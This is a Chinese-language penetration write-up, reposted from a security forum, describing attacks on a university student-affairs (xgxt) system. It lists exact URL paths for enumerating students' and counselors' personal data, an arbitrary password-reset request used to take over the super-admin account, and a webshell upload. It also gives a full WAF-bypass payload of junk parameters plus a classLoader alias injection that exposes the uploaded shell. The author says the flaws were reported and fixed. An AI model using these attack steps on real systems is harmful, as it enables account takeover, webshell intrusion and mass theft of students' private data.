实战|挖掘0day打进不同学校

发布时间:2022-06-27 发布网站:脚本宝典
脚本宝典收集整理的这篇文章主要介绍了实战|挖掘0day打进不同学校脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。

 写在前面

下文的所有漏洞都是需要有学校统一门户的账号和密码的情况下才能挖掘出来的

 

不过我也有挖到个别特殊的学校个例,可以直接未授权访问那些目录页面造成危害。

 

挖掘的案例均已提交至漏洞平台并已经修复。禁止用于违法途径

过程

首先登陆统一门户,登录账号密码,找到学工系统页面:

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

 

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

 

1.越权漏洞:

访问以下的路径:

http://x.x.x.x/xgxt/xsxx_xsgl.do?method=showStudentsAjax&isAll=true 然后便可查看所有学生列表:

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

http://x.x.x.x/xgxt/general_szdw.do?method=szdwRybb&lx=fdy 然后便可查看所有辅导员列表:

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

http://x.x.x.x/xgxt/xsxx_xsgl.do?method=getXsjbxxMore&xh=某学号

然后便可以查看该学号的学生的敏感信息:

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

最后根据该漏洞可以编写个脚本,来批量获取系统内用户的敏感信息,效果如下:

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

2.任意密码重置漏洞:

访问该路径:

http://x.x.x.x/xgxt/mmzhgl_mmzh.do?method=xgmm&yhm=想要修改的账号

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

然后可以将系统内置的超级管理员账号的密码重置,我重置为test0123:

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

然后再退出到http://x,x,x,x/xgxt/的学工系统登录页面,重新登录:

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

登录成功:

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

 

既然是超级管理员,那么便可查看到许多敏感信息了,这里就不截图和赘述了。

 

3.文件上传漏洞(需要绕过waf的拦截): 访问该路径: http://x.x.x.x/xgxt/commXszz.do?method=uploadFile 这里我上传的是jspx木马,查看网站页面源代码来获取文件路径:

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

 

访问http://x.x.x.x/xgxt/mmzhgl_mmzh.do?method=checkYh&type=view

然后用Burp Suite用POST方式填充垃圾字符数据可绕过waf。

方法就是利用脚本生成一个垃圾字符数据,或者自己aaaa什么的堆叠一下,因为有些waf要是字节超出了范围,那么就不会检测到堆叠之后的马

同时也可以利用注释符(可用<!– … –>来注释)再注释掉脏数据,那么就只剩下马了,waf就绕过了:

method=checkYh&amp;type=view&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;a=1&amp;&amp;class.classLoader.resources.dirContext.aliases=/abcd=/upload/xxxx/

 

 

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

 

然后拼合url,获取木马地址:http://x.x.x.x/xgxt/abcd/xxx.jspx

实战|挖掘0day打进不同学校

实战|挖掘0day打进不同学校

至此,完成本次渗透过程。

 

作者:Johnson666 原文地址:https://forum.butian.net/share/385

脚本宝典总结

以上是脚本宝典为你收集整理的实战|挖掘0day打进不同学校全部内容,希望文章能够帮你解决实战|挖掘0day打进不同学校所遇到的问题。

如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。
标签: